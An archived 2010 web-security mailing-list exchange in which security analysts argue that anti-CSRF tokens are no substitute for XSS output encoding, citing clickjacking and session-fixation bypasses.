[WEB SECURITY] Anti-CSRF mesaues will mitigate XSS

nilesh kumar nileshkumar83 at yahoo.co.in
Sat Jun 26 03:56:20 EDT 2010


Hi Lava,

>ClickJacking can be used to bypass Anti-CSRF measures in many 
instances.
>Tomorrow we might have a new technique to bypass CSRF countermeasures.

Good points. Exactly, I agree with you. We have also recommended the same thing-don't take chances, do fix both issues.
Thanks for your comments!

Thanks & Regards,

Nilesh Kumar,

Security Analyst,
Honewyell, India

--- On Sat, 26/6/10, lavakumar kuppan <lavakumar.in at gmail.com> wrote:

From: lavakumar kuppan <lavakumar.in at gmail.com>
Subject: Re: [WEB SECURITY] Anti-CSRF mesaues will mitigate XSS
To: nileshkumar83 at yahoo.co.in
Cc: websecurity at webappsec.org
Date: Saturday, 26 June, 2010, 2:11 AM

Nilesh,
ClickJacking can be used to bypass Anti-CSRF measures in many instances.
Ref:http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html


http://www.contextis.co.uk/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf



So now if your protection against XSS was only CSRF tokens then by using ClickJacking an attacker can perform an XSS attack.
Tomorrow we might have a new technique to bypass CSRF countermeasures.


And everytime that happens the application would be open to two attacks CSRF as well as XSS.
Moreover, if the attacker can perform a Session fixation attack and use his session's Anti-CSRF tokens to perform XSS, the user would still be in trouble.

Because the attacker can then steal locally stored data - LSOs, cookies, LocalStorage, Web SQL Storage, Password Manager (http://ha.ckers.org/weird/xss-password-manager.html) etc.

And with all the Cross Domain communication possibilities in HTML5, the attacker could start attacking the other applications that communicate with the vulnerable application.

There has been some great points from others as well and so far its been a overwhelming NO to using Anti-CSRF for XSS protection.
Hope this gives enough reasons for the programmers to write a few extra lines of code to encode the user output ;)

Cheers,Lavahttp://www.andlabs.org









-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20100626/d3ac5b7d/attachment.html>


More information about the websecurity mailing list